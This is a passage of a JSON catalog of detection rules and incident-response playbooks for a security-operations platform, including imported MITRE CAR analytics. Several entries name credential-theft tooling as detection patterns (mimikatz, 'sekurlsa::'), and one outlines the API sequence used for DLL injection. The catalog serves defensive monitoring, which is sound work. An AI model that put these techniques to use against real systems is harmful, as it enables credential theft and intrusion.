"host-containment-response-v1", "type": "detection", "name": "Host Containment Response", "description": "General-purpose host containment playbook for any threat requiring immediate endpoint isolation. 
Performs pre-isolation forensic collection, isolates the host, notifies the IR team, and starts the investigation workflow.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "containment", "endpoint", "isolation", "edr", "incident-response" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/host-containment-response.yaml" }, { "id": "iam-key-compromise-response-v1", "type": "detection", "name": "IAM Key Compromise Response", "description": "Responds to compromised IAM access keys including keys exposed in public repositories, leaked in logs, or used from unexpected geolocations. Immediately disables the key, audits recent API usage, and rotates credentials.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "iam", "aws", "cloud", "key-compromise", "credential-leak" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/iam-key-compromise-response.yaml" }, { "id": "ids-alert-response-v1", "type": "detection", "name": "IDS/IPS Alert Response", "description": "Responds to Intrusion Detection/Prevention System alerts including network scans, exploitation attempts, and protocol anomalies. 
Blocks the attacking source, captures PCAP evidence, and notifies the network security team.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "ids", "ips", "network", "intrusion-detection", "nids" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/ids-alert-response.yaml" }, { "id": "insider-threat-response-v1", "type": "detection", "name": "Insider Threat Response", "description": "Responds to suspected insider threat activity including unauthorized data access, bulk downloads, privilege abuse, or off-hours anomalous activity. Escalates to HR and Legal with full audit trail.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "insider-threat", "dlp", "ueba", "identity", "data-exfiltration" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/insider-threat-response.yaml" }, { "id": "iso-27001-violation-response-v1", "type": "detection", "name": "ISO 27001 Control Violation Response", "description": "Responds to ISO 27001 information security control violations including unauthorized access to sensitive information, policy breaches, and audit findings. 
Creates compliance records, notifies the CISO, and initiates corrective action procedures.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "iso27001", "compliance", "governance", "policy-violation", "audit" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/iso-27001-violation-response.yaml" }, { "id": "lateral-movement-response-v1", "type": "detection", "name": "Lateral Movement Response", "description": "Responds to detected lateral movement activity including pass-the-hash, pass-the-ticket, remote service abuse, and admin share enumeration. Isolates affected hosts, revokes lateral credentials, and maps the blast radius.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "lateral-movement", "endpoint", "network", "credential-abuse", "active-directory" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/lateral-movement-response.yaml" }, { "id": "malware-detection-response-v1", "type": "detection", "name": "Malware Detection Response", "description": "Responds to malware detections across endpoints. Quarantines the malicious file, isolates the host if needed, runs deep scan, and notifies the IR team. 
Supports trojan, spyware, adware, worm, and backdoor classifications.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "malware", "endpoint", "edr", "antivirus", "containment" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/malware-detection-response.yaml" }, { "id": "mfa-fatigue-response-v1", "type": "detection", "name": "MFA Fatigue Attack Response", "description": "Responds to MFA push fatigue attacks where attackers spam authentication requests hoping the user accidentally approves. Detects rapid successive MFA prompts, temporarily blocks push notifications, and forces re-enrollment.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "mfa-fatigue", "identity", "authentication", "push-bombing", "account-takeover" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/mfa-fatigue-response.yaml" }, { "id": "mitre-car-car-2013-01-003", "type": "detection", "name": "SMB Events Monitoring", "description": "[Server Message Block](https://en.wikipedia.org/wiki/Server_Message_Block) (SMB) is used by Windows to allow for file, pipe, and printer sharing over port 445/tcp. It allows for enumerating, and reading from and writing to file shares for a remote computer. Although it is heavily used by Windows servers for legitimate purposes and by users for file and printer sharing, many adversaries also use SMB to achieve [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Looking at this activity more closely to obtain an adequate sense of situational awareness may make it possible to detect adversaries moving between hosts in a way that deviates from normal activity. 
Because SMB traffic is heavy in many environments, this analytic may be difficult to turn into something that can be used to quickly detect an APT. In some cases, it may make more sense to run this analytic in a forensic fashion. Looking through and filtering its output after an intrusion has been discovered may be helpful in identifying the scope of compromise.\n\n### Output Description\n\nThe source, destination, content, and time of each event.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1039", "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-01-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-01-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-01-003.yaml" } }, { "id": "mitre-car-car-2013-02-003", "type": "detection", "name": "Processes Spawning cmd.exe", "description": "The Windows [Command Prompt](https://en.wikipedia.org/wiki/cmd.exe) (`cmd.exe`) is a utility that provides a command line interface to Windows operating systems. It provides the ability to run additional programs and also has several built-in commands such as `dir`, `copy`, `mkdir`, and `type`, as well as batch scripts (`.bat`). Typically, when a user runs a command prompt, the parent process is `explorer.exe` or another instance of the prompt. There may be automated programs, logon scripts, or administrative tools that launch instances of the command prompt in order to run scripts or other built-in commands. Spawning the process `cmd.exe` from certain parents may be more indicative of malice. 
For example, if Adobe Reader or Outlook launches a command shell, this may suggest that a malicious document has been loaded and should be investigated. Thus, by looking for abnormal parent processes of `cmd.exe`, it may be possible to detect adversaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-02-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-02-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-02-003.yaml" } }, { "id": "mitre-car-car-2013-02-008", "type": "detection", "name": "Simultaneous Logins on a Host", "description": "Multiple users logged into a single machine at the same time, or even within the same hour, do not typically occur in networks we have observed.\n\nLogon events are Windows Event Code 4624 for Windows Vista and above, 518 for pre-Vista. Logoff events are 4634 for Windows Vista and above, 538 for pre-Vista.\nLogon types 2, 3, 9 and 10 are of interest. 
For more details see the Logon Types table on Microsoft's [Audit Logon Events](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc787567(v=ws.10)) page.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-02-008.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-02-008", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-02-008.yaml" } }, { "id": "mitre-car-car-2013-03-001", "type": "detection", "name": "Reg.exe called from Command Shell", "description": "Registry modifications are often essential in establishing persistence via known Windows mechanisms. Many legitimate modifications are done graphically via `regedit.exe` or by using the corresponding channels, or even calling the Registry APIs directly. The built-in utility `reg.exe` provides a [command-line interface](https://en.wikipedia.org/wiki/Command-line_interface) to the registry, so that queries and modifications can be performed from a shell, such as `cmd.exe`. When a user is responsible for these actions, the parent of `cmd.exe` will likely be `explorer.exe`. Occasionally, power users and administrators write scripts that do this behavior as well, but likely from a different process tree. These background scripts must be learned so they can be tuned out accordingly.\n\n### Output Description\n\nThe sequence of processes that resulted in `reg.exe` being started from a shell. 
That is, a hierarchy that looks like\n\n- `great-grand_parent.exe`\n- `grand_parent.exe`\n- `parent.exe`\n- `reg.exe`", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1012", "T1112", "T1547", "T1574" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-03-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-03-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-03-001.yaml" } }, { "id": "mitre-car-car-2013-04-002", "type": "detection", "name": "Quick execution of a series of suspicious commands", "description": "Certain commands are frequently used by malicious actors and infrequently used by normal users. 
By looking for execution of these commands in short periods of time, we can not only see when a malicious user was on the system but also get an idea of what they were doing.\n\nCommands of interest:\n\n- arp.exe\n- at.exe\n- attrib.exe\n- cscript.exe\n- dsquery.exe\n- hostname.exe\n- ipconfig.exe\n- mimikatz.exe\n- nbtstat.exe\n- net.exe\n- netsh.exe\n- nslookup.exe\n- ping.exe\n- quser.exe\n- qwinsta.exe\n- reg.exe\n- runas.exe\n- sc.exe\n- schtasks.exe\n- ssh.exe\n- systeminfo.exe\n- taskkill.exe\n- telnet.exe\n- tracert.exe\n- wscript.exe\n- xcopy.exe\n\n### Output Description\n\nThe host on which the commands were executed, the time of execution, and what commands were executed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1087", "T1003", "T1069", "T1057", "T1021", "T1543", "T1112", "T1574", "T1018", "T1569", "T1053", "T1029", "T1033", "T1007", "T1082", "T1049", "T1016", "T1010", "T1518", "T1046", "T1562", "T1098", "T1059", "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-04-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-04-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-04-002.yaml" } }, { "id": "mitre-car-car-2013-05-002", "type": "detection", "name": "Suspicious Run Locations", "description": "In Windows, files should never execute out of certain directory locations. Any of these locations may exist for a variety of reasons, and executables may be present in the directory but should not execute. As a result, some defenders make the mistake of ignoring these directories and assuming that a process will never run from one. 
There are known TTPs that have taken advantage of this fact to go undetected. This fact should inform defenders to monitor these directories more closely, knowing that they should never contain running processes.\n\nMonitors the directories\n\n- `*:\\RECYCLER`\n- `*:\\SystemVolumeInformation`\n- `%systemroot%\\Tasks`\n- `%systemroot%\\debug`", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-05-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-05-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-05-002.yaml" } }, { "id": "mitre-car-car-2013-05-003", "type": "detection", "name": "SMB Write Request", "description": "As described in [CAR-2013-01-003](../CAR-2013-01-003), SMB provides a means of remotely managing a file system. Adversaries often use SMB to move laterally to a host. SMB is commonly used to upload files. It may be used for staging in [Exfiltration](https://attack.mitre.org/tactics/TA0010) or as a [Lateral Movement](https://attack.mitre.org/tactics/TA0008) technique. Unlike SMB Reads, SMB Write requests typically require an additional level of access, resulting in less activity. 
Focusing on SMB Write activity narrows the field to find techniques that actively change remote hosts, instead of passively reading files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1570", "T1021", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-05-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-05-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-05-003.yaml" } }, { "id": "mitre-car-car-2013-05-004", "type": "detection", "name": "Execution with AT", "description": "In order to gain [persistence](https://attack.mitre.org/tactics/TA0003/), [privilege escalation](https://attack.mitre.org/tactics/TA0004/), or [remote execution](https://attack.mitre.org/tactics/TA0002/), an adversary may use the Windows built-in command AT (at.exe) to [schedule a command](https://attack.mitre.org/techniques/T1053/002) to be run at a specified time, date, and even host. This method has been used by adversaries and administrators alike. Its use may lead to detection of compromised hosts and compromised users if it is used to move laterally.\nThe built-in Windows tool schtasks.exe ([CAR-2013-08-001](../CAR-2013-08-001)) offers greater flexibility when creating, modifying, and enumerating tasks. 
For these reasons, schtasks.exe is more commonly used by administrators, tools/scripts, and power users.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-05-004.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-05-004", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-05-004.yaml" } }, { "id": "mitre-car-car-2013-05-005", "type": "detection", "name": "SMB Copy and Execution", "description": "An adversary needs to gain access to other hosts to move throughout an environment. In many cases, this is a twofold process. First, a file is remotely written to a host via an SMB share (detected by [CAR-2013-05-003](../CAR-2013-05-003)). Then, a variety of [Execution](https://attack.mitre.org/tactics/TA0002) techniques can be used to remotely establish execution of the file or script. To detect this behavior, look for files that are written to a host over SMB and then later run directly as a process or in the command line arguments. SMB File Writes and Remote Execution may happen normally in an environment, but the combination of the two behaviors is less frequent and more likely to indicate adversarial activity.\n\nThis can possibly extend to more copy protocols in order to widen its reach, or it could be tuned more finely to focus on specific program run locations (e.g. 
`%SYSTEMROOT%\\system32`) to gain a higher detection rate.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1021", "T1078", "T1570" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-05-005.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-05-005", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-05-005.yaml" } }, { "id": "mitre-car-car-2013-05-009", "type": "detection", "name": "Running executables with same hash and different names", "description": "Executables are generally not renamed, thus a given hash of an executable should only have ever one name. Identifying instances where multiple process names share the same hash may find cases where tools are copied by attackers to different folders or hosts to [avoid detection](https://attack.mitre.org/tactics/TA0005).\n\nAlthough this analytic was initially based on MD5 hashes, it is equally applicable to any hashing convention.\n\n### Output Description\n\nA list of hashes and the different executables associated with each one", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-05-009.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-05-009", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": 
"analytics/CAR-2013-05-009.yaml" } }, { "id": "mitre-car-car-2013-07-001", "type": "detection", "name": "Suspicious Arguments", "description": "Malicious actors may rename built-in commands or external tools, such as those provided by SysInternals, to better [blend in](https://attack.mitre.org/tactics/TA0005) with the environment. In those cases, the file path name is arbitrary and may blend in well with the background. If the arguments are closely inspected, it may be possible to infer what tools are running and understand what an adversary is doing. When any legitimate software shares the same command lines, it must be whitelisted according to the expected parameters.\n\nAny tool of interest with commonly known command line usage can be detecting by command line analysis. Known substrings of command lines include\n\n- PuTTY\n- port forwarding `-R * -pw`\n- secure copy (scp) `-pw * * *@*`\n- mimikatz `sekurlsa::`\n- RAR `* -hp *`\n- Archive`* a *`\n Additionally, it may be useful to find IP addresses in the command line\n- `\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}`\n Logically this analytic makes use of [CAR-2014-03-005](../CAR-2014-03-005).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1003", "T1021", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-07-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-07-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-07-001.yaml" } }, { "id": "mitre-car-car-2013-07-002", "type": "detection", "name": "RDP Connection Detection", "description": "The [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) 
(RDP), built in to Microsoft operating systems, allows a user to remotely log in to the desktop of another host. It allows for interactive access of the running windows, and forwards key presses, mouse clicks, etc. Network administrators, power users, and end-users may use RDP for day-to-day operations. From an adversary's perspective, RDP provides a means to [laterally move](https://attack.mitre.org/tactics/TA0008) to a new host. Determining which RDP connections correspond to adversary activity can be a difficult problem in highly dynamic environments, but will be useful in identifying the scope of a compromise.\n\nRemote Desktop can be detected in several ways\n\n- Network connections to port 3389/tcp (assuming use of the default port)\n- Packet capture analysis\n- Windows security logs (Event ID 4624, 4634, 4647, 4778)\n- Detecting network connections from `mstsc.exe`\n- Execution of the process `rdpclip.exe`\n- Runs as the clipboard manager on the RDP target if clipboard sharing is enabled\n\n### Output Description\n\nThe time of the Connection, the source, the destination, and the user name used", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-07-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-07-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-07-002.yaml" } }, { "id": "mitre-car-car-2013-07-005", "type": "detection", "name": "Command Line Usage of Archiving Software", "description": "Before [exfiltrating data](https://attack.mitre.org/tactics/TA0010) that an adversary has 
[collected](https://attack.mitre.org/tactics/TA0009), it is very likely that a [compressed archive](https://attack.mitre.org/techniques/T1560) will be created, so that transfer times are minimized and fewer files are transmitted. There is variety between the tools used to compress data, but the command line usage and context of archiving tools, such as ZIP, RAR, and 7ZIP, should be monitored.\n\nIn addition to looking for RAR or 7z program names, command line usage of 7Zip or RAR can be detected with the flag usage of \"`\\* a \\*`\". This is helpful, as adversaries may change program names.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1560" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-07-005.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-07-005", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-07-005.yaml" } }, { "id": "mitre-car-car-2013-08-001", "type": "detection", "name": "Execution with schtasks", "description": "The Windows built-in tool `schtasks.exe` provides the creation, modification, and running of [scheduled tasks](https://attack.mitre.org/techniques/T1053) on a local or remote computer. It is provided as a more flexible alternative to `at.exe`, described in [CAR-2013-05-004](../CAR-2013-05-004). Although used by adversaries, the tool is also legitimately used by administrators, scripts, and software configurations. 
The scheduled tasks tool can be used to gain [Persistence](https://attack.mitre.org/tactics/TA0003) and can be used in combination with a [Lateral Movement](https://attack.mitre.org/tactics/TA0008) technique to remotely gain [execution](https://attack.mitre.org/tactics/TA0002). Additionally, the command has parameters to specify the user and password responsible for creating the task, as well as the user and password combination that the task will run as. The `/s` flag specifies the remote system on which the task should be scheduled, usually indicating [Lateral Movement](https://attack.mitre.org/tactics/TA0008).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-08-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-08-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-08-001.yaml" } }, { "id": "mitre-car-car-2013-09-003", "type": "detection", "name": "SMB Session Setups", "description": "Account usage within SMB can be used to identify compromised credentials, and the hosts accessed with them.\n\nThis analytic monitors SMB activity that deals with user activity rather than file activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1187" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-09-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-09-003", "source_commit": 
"1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-09-003.yaml" } }, { "id": "mitre-car-car-2013-09-005", "type": "detection", "name": "Service Outlier Executables", "description": "New executables that are started as a service are suspicious. This analytic looks for anomalous service executables.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-09-005.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-09-005", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-09-005.yaml" } }, { "id": "mitre-car-car-2013-10-001", "type": "detection", "name": "User Login Activity Monitoring", "description": "Monitoring logon and logoff events for hosts on the network is very important for situational awareness. This information can be used as an indicator of unusual activity as well as to corroborate activity seen elsewhere.\n\nCould be applied to a number of different types of monitoring depending on what information is desired. Some use cases include monitoring for all remote connections and building login timelines for users.\nLogon events are Windows Event Code 4624 for Windows Vista and above, 518 for pre-Vista. 
Logoff events are 4634 for Windows Vista and above, 538 for pre-Vista.\n\n### Output Description\n\nThe time of login events for distinct users on individual systems", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1021", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-10-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-10-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-10-001.yaml" } }, { "id": "mitre-car-car-2013-10-002", "type": "detection", "name": "DLL Injection via Load Library", "description": "Microsoft Windows allows for processes to remotely create threads within other processes of the same privilege level. This functionality is provided via the Windows API [CreateRemoteThread](https://msdn.microsoft.com/en-us/library/windows/desktop/ms682437.aspx). Both Windows and third-party software use this ability for legitimate purposes. For example, the Windows process [csrss.exe](https://en.wikipedia.org/wiki/Client/Server_Runtime_Subsystem) creates threads in programs to send signals to registered callback routines. Both adversaries and host-based security software use this functionality to [inject DLLs](https://attack.mitre.org/techniques/T1055), but for very different purposes. An adversary is likely to inject into a program to [evade defenses](https://attack.mitre.org/tactics/TA0005) or [bypass User Account Control](https://attack.mitre.org/techniques/T1548/002), but a security program might do this to gain increased monitoring of API calls. 
One of the most common methods of [DLL Injection](https://attack.mitre.org/techniques/T1055) is through the Windows API [LoadLibrary](https://msdn.microsoft.com/en-us/library/windows/desktop/ms684175.aspx).\n\n- Allocate memory in the target program with [VirtualAllocEx](https://msdn.microsoft.com/en-us/library/windows/desktop/aa366890.aspx)\n- Write the name of the DLL to inject into this program with [WriteProcessMemory](https://msdn.microsoft.com/en-us/library/windows/desktop/ms681674.aspx)\n- Create a new thread and set its entry point to [LoadLibrary](https://msdn.microsoft.com/en-us/library/windows/desktop/ms684175.aspx) using the API [CreateRemoteThread](https://msdn.microsoft.com/en-us/library/windows/desktop/ms682437.aspx).\n\nThis behavior can be detected by looking for thread creations across processes, and resolving the entry point to determine the function name. If the function is `LoadLibraryA` or `LoadLibraryW`, then the intent of the remote thread is clearly to inject a DLL. 
When this is the case, the source process must be examined so that it can be ignored when it is both expected and a trusted process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1055", "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-10-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-10-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-10-002.yaml" } }, { "id": "mitre-car-car-2014-02-001", "type": "detection", "name": "Service Binary Modifications", "description": "Adversaries may modify the binary file for an existing service to achieve [Persistence](https://attack.mitre.org/tactics/TA0003) while potentially [evading defenses](https://attack.mitre.org/tactics/TA0005). If a newly created or modified runs as a service, it may indicate APT activity. However, services are frequently installed by legitimate software. 
A well-tuned baseline is essential to differentiating between benign and malicious service modifications.\n\n### Output Description\n\nThe Service Name and approximate time in which changes occurred on each host", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1543", "T1574", "T1569" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-02-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-02-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-02-001.yaml" } }, { "id": "mitre-car-car-2014-03-001", "type": "detection", "name": "SMB Write Request - NamedPipes", "description": "An SMB write can be an indicator of lateral movement, especially when combined with other information such as execution of that written file. Named pipes are a subset of SMB write requests. Named pipes such as msftewds may not be alarming; however others, such as lsarpc, may.\n\nMonitoring SMB write requests still creates some noise, particulary with named pipes. 
As a result, SMB is now split between writing named pipes and writing other files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1570" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-03-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-03-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-03-001.yaml" } }, { "id": "mitre-car-car-2014-03-005", "type": "detection", "name": "Remotely Launched Executables via Services", "description": "There are several ways to cause code to [execute](https://attack.mitre.org/tactics/TA0002) on a remote host. One of the most common methods is via the Windows [Service Control Manager](https://en.wikipedia.org/wiki/Service_Control_Manager) (SCM), which allows authorized users to remotely create and modify services. Several tools, such as [PsExec](https://attack.mitre.org/software/S0029), use this 